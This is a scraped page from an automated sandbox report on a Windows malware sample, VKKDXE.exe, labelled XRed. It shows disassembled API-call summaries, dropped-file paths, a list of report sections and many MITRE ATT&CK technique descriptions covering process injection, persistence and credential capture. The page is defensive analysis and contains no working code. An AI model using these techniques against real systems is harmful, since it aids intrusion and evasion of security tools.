Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: DirectoryFreeLibrarySystem
String ID: WIN_XPe
API String ID: 510247158-3257408948
Opcode ID: fddda7127e0631b8cb76678503ea0523363c455ce561b19c29880dc716fd29d4
Instruction ID: 1990164098af5eb5d4ba2319d2094003b8c9072b4fd1fad183422120939b83d4
Opcode Fuzzy Hash: fddda7127e0631b8cb76678503ea0523363c455ce561b19c29880dc716fd29d4
Instruction Fuzzy Hash: EBE0C970C0420EEFCB25DBA9CC49AECB7B9BB08301F148496E562B2160C7B19A44DF35

Function 00DA84C9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00DA84DF
PostMessageW.USER32(00000000), ref: 00DA84E6

Part of subcall function 00D88355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00D883CD

Strings

Shell_TrayWnd, xrefs: 00DA84D8

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 64309be15245f323d49054bda17c9b81726b2bf20dcd062daa6f876af984a283
Instruction ID: 1f9d6d0071a0fc40c08c6e4731896ad740488211936c367d729f40c59a071cae
Opcode Fuzzy Hash: 64309be15245f323d49054bda17c9b81726b2bf20dcd062daa6f876af984a283
Instruction Fuzzy Hash: 1CD0C972384719BBE665A7709C4FFD67655AB18B11F060929734AEA2D0C9A0B804C774

Function 00DA8495 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00DA849F
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00DA84B2

Part of subcall function 00D88355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00D883CD

Strings

Shell_TrayWnd, xrefs: 00DA8498

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 9245de2fed7af6e79ab8378ab768b0936f161991b95c3d6659e8adaff3a01aa2
Instruction ID: a9afb47475bc02305bd8202678926cf938f6fbe79585a801ca4a8d207dbedcbb
Opcode Fuzzy Hash: 9245de2fed7af6e79ab8378ab768b0936f161991b95c3d6659e8adaff3a01aa2
Instruction Fuzzy Hash: 11D0C972384719BBE665A7709C4FFD67A55AB14B11F060929734AEA2D0C9A0B804C770

Function 00D8D009 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 00D8D01E
GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00D8D035

Strings

aut, xrefs: 00D8D02F

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 450c98d5319cfce203244dcf4d8471e080b3ecfdaa0d8ed9303dbb05193854a3
Instruction ID: 323569bf4d74df9ed86e6ee3509bea2203ecd1f77ef0eea29502b467d6d0ab9f
Opcode Fuzzy Hash: 450c98d5319cfce203244dcf4d8471e080b3ecfdaa0d8ed9303dbb05193854a3
Instruction Fuzzy Hash: 57D05EB154030FBBDB10ABA0ED0EFA9BB6CA700704F1041A07714D50D1D2F0D6498BB4

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Drive: Drive Creation, File: File Access, File: File Creation, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Process: OS API Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report VKKDXE.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: XRed

Yara Signatures

Initial Sample

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\Heartbeat\HeartbeatCache.xml

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Synaptics.exe_56f1e7e6dd49e686cdf4ffd820ded92baa13c65_455b7b6e_d4a9fcf6-d18d-48f4-991b-8548e68d9718\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Synaptics.exe_d6be89fd9263ead55c8d42f83d286de07578feeb_455b7b6e_ad93f567-4f8b-425b-be90-a480636c7c8d\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB2FE.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERBE0B.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERBE2B.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCA01.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD4DF.tmp.WERInternalMetadata.xml

Windows Analysis Report
VKKDXE.exe

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre